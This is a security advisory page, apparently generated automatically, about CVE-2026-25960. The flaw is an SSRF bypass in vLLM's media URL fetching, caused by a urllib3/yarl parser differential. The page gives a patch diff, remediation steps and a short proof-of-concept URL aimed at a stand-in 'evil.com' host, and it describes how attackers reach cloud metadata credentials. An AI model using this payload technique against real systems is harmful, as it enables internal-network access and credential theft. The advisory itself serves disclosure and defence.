CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-25960
7.1

CVE-2026-25960: Server-Side Request Forgery (SSRF) Bypass in vLLM MediaConnector via Parser Differential

Amit Schendel
Amit Schendel
Senior Security Researcher

Mar 9, 2026·5 min read·2 visits

PoC Available

Executive Summary (TL;DR)

A URL parser differential between the validation layer and the HTTP client in vLLM allows attackers to bypass SSRF restrictions using the '\@' character sequence, granting unauthorized read access to internal network resources.

vLLM contains a critical parser differential vulnerability that allows attackers to bypass existing Server-Side Request Forgery (SSRF) protections. By exploiting parsing discrepancies between urllib3 and yarl, attackers can craft specific URLs that pass validation but direct the underlying HTTP client to query internal network services and cloud metadata endpoints.

Vulnerability Overview

vLLM is a high-throughput and memory-efficient inference and serving engine for Large Language Models. To support multimodal model inference, the engine includes a MediaConnector component responsible for fetching external media resources, such as images, from user-provided URLs.

CVE-2026-25960 represents a Server-Side Request Forgery (SSRF) bypass within this specific component. The vulnerability undermines the domain allowlist protections previously introduced in version 0.15.1 to resolve CVE-2026-24779. It exposes the underlying infrastructure to reconnaissance and data exfiltration attacks.

The flaw originates from a parser differential between the validation library (urllib3) and the network execution library (aiohttp utilizing yarl). Because these two libraries interpret malformed URL strings differently, an attacker can construct a payload that the validator categorizes as benign, but the execution layer interprets as a target on the internal network.

Root Cause Analysis

The core issue is a parser differential triggered by the inclusion of a backslash (\) immediately preceding an at-symbol (@) within the authority component of a URL. The vLLM application relies on urllib3.util.parse_url() to extract the hostname and validate it against a configured allowlist, but employs aiohttp to perform the actual network request.

When the urllib3 parser processes a sequence such as http://trusted.com\@evil.com, it interprets the backslash as a path separator or an invalid character that terminates the authority section. Consequently, it parses the hostname strictly as trusted.com. If trusted.com resides on the allowed domains list, the validation routine permits the request to proceed.

Conversely, the yarl library, which provides URL parsing for aiohttp, adheres to a different interpretation of RFC 3986. It processes the backslash and the preceding trusted.com string as part of the userinfo subcomponent (user credentials). The @ symbol delineates the end of the userinfo block, causing yarl to extract evil.com as the actual destination hostname.

Code Analysis

Prior to version 0.17.0, the load_from_url_async method in vllm/multimodal/media/connector.py accepted a user-supplied URL and passed it through the validation logic. Once validated, the original, un-normalized string was passed directly to the aiohttp connection pool. This separation between validation input and execution input created the exact conditions required for a parser differential exploit.

The official patch addresses this by unifying the input consumed by both the validation and execution routines. The fix alters the async_get_bytes call to utilize the normalized URL object generated by the validation layer.

@@ -177,7 +177,7 @@ async def load_from_url_async(
 
             connection = self.connection
             data = await connection.async_get_bytes(
-                url,
+                url_spec.url,
                 timeout=fetch_timeout,
                 allow_redirects=envs.VLLM_MEDIA_URL_ALLOW_REDIRECTS,
             )

By passing url_spec.url instead of the raw url variable, the HTTP client processes a strictly normalized string where ambiguity has been resolved by urllib3. This ensures the requested destination aligns perfectly with the validated destination, completely eliminating the parser differential.

Exploitation Methodology

An attacker exploits this vulnerability by submitting a crafted media URL during a multimodal inference request. The objective is to target internal services that lack authentication requirements, such as a local management interface on 127.0.0.1 or the standard cloud provider metadata endpoint at 169.254.169.254.

The payload structure relies on knowing or guessing at least one domain present in the application's allowed_media_domains configuration. If 127.0.0.1 is allowlisted, the attacker constructs a payload formatted as http://127.0.0.1:80\@attacker-controlled.com/resource (to pivot externally) or vice-versa to pivot internally.

The following proof-of-concept snippet demonstrates the logic flow. The application validates the string against the allowlist, while the underlying client executes the request against the secondary domain defined in the payload.

import aiohttp
import pytest
from vllm.multimodal.media.connector import MediaConnector
 
@pytest.mark.asyncio
async def test_ssrf_bypass_demo():
    bypass_url = "http://127.0.0.1:80\@evil.com/malicious_payload"
    connector = MediaConnector(allowed_media_domains=["127.0.0.1"])
    
    try:
        await connector.fetch_image_async(bypass_url)
    except Exception as e:
        print(f"Bypass failed as expected: {e}")

Impact Assessment

The vulnerability carries a CVSS v3.1 score of 7.1, reflecting a High confidentiality impact. Exploitation grants an attacker read access to internal HTTP endpoints reachable from the vLLM deployment environment. This access directly compromises data confidentiality and exposes internal network topologies.

The most critical risk involves the exfiltration of cloud IAM credentials. Many cloud environments host metadata services at standard non-routable IP addresses. By routing requests to these endpoints, attackers extract temporary security credentials, enabling lateral movement and potential control over the broader cloud infrastructure.

Integrity impact is rated as None, as SSRF vulnerabilities inherently restrict the attacker to emitting HTTP GET requests without the ability to modify internal server state. Availability impact is Low, reflecting the possibility that an attacker routing high volumes of requests to fragile internal services may induce localized denial-of-service conditions.

Mitigation and Remediation

The primary remediation strategy requires upgrading the vLLM deployment to version 0.17.0 or later. This release incorporates commit 6f3b2047abd4a748e3db4a68543f8221358002c0, which correctly normalizes the URL before network execution. Administrators should verify the version in their container registries and deployment pipelines.

For environments unable to immediately deploy the patch, network-level egress filtering provides effective defense-in-depth. Deployments should operate in restricted network namespaces or utilize strict firewall rules that block outbound access to local subnets and the 169.254.169.254 cloud metadata address space.

Security operators should implement Web Application Firewall (WAF) signatures or input validation filters at the ingress layer. Rejecting HTTP requests containing the \@ sequence in URI parameters or JSON payloads prevents the malformed input from reaching the vulnerable parsing logic.

Official Patches

vLLM ProjectOfficial Security Advisory
vLLM ProjectFix Pull Request

Fix Analysis (1)

Technical Appendix

CVSS Score
7.1/ 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L

Affected Systems

vLLM versions >= 0.15.1, < 0.17.0

Affected Versions Detail

Product
Affected Versions
Fixed Version
vLLM
vLLM Project
>= 0.15.1, < 0.17.00.17.0
AttributeDetail
CWE IDCWE-918
Attack VectorNetwork
CVSS Score7.1 (High)
ImpactHigh Confidentiality, Low Availability
Exploit StatusProof of Concept Available
Root CauseParser Differential (urllib3 vs yarl)

MITRE ATT&CK Mapping

T1190Exploit Public-Facing Application
Initial Access
T1005Data from Local System
Collection
CWE-918
Server-Side Request Forgery (SSRF)

Server-Side Request Forgery (SSRF) via URL Parser Differential

Known Exploits & Detection

vLLM Security Test CasesProof of concept code demonstrating the bypass logic within the project's own test suite.

Vulnerability Timeline

Official fix committed to the vLLM repository.
2026-02-18
Vulnerability publicly disclosed and GHSA published.
2026-03-09
CVE-2026-25960 officially assigned.
2026-03-09

References & Sources

  • [1]GHSA-v359-jj2v-j536: SSRF Bypass in vLLM
  • [2]Pull Request 34743: Fix SSRF Bypass
  • [3]Fix Commit 6f3b204
  • [4]Related Advisory GHSA-qh4c-xf7m-gxfc (Initial Fix)

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.